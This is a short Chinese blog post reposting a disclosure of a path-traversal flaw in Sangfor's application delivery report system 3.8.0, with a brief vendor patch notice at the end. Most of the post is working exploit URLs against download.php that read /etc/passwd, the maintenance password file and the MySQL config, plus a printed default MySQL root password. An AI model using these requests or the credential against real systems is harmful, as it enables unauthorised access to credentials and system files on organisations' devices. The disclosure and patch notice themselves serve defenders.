提醒:利用此漏洞进行非法入侵与本站无关,建议大家在授权的条件下测试。
Author: 7z1
版本:SANGFOR-AD-3.8.0 (深信服应用交付报表系统3.8.0)
下载漏洞
http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd
深信服后台维护密码获取:
http://www.site.cn:85/report/download.php?pdf=../../../../..//etc/updateme/passwd
深信服应用交付报表系统MYSQL数据库账户获取:
http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/condb/conn_mysql.php
一般默认MYSQL账户密码 ($con = mysql_connect(“localhost”,”root”,”sinfors”); )
获取跟远端通信的端口
http://www.site.cn:85/report/download.php?pdf=../../../../..//app/usr/web/wwwroot/report/include/gfad_get_remote_data.php
原文:http://www.1990day.com/index.php/0days/19.html
———————————————–
新浪微博的@lzhi 告诉游侠:
目前深信服该漏洞只在3.8版本以下存在,目前提供给到客户的应用交付版本为4.2.针对该漏洞的补丁会在近期提供。
游侠提醒:
未升级的客户请自行联系深信服升级。
其实,安全产品出现漏洞也是常事,一些国际大厂也不能避免。并且一般人也并不知道设备的IP地址,因此无需恐慌!
标签: Sangfor, sangfor漏洞, 应用交付, 深信服, 深信服应用交付漏洞, 深信服漏洞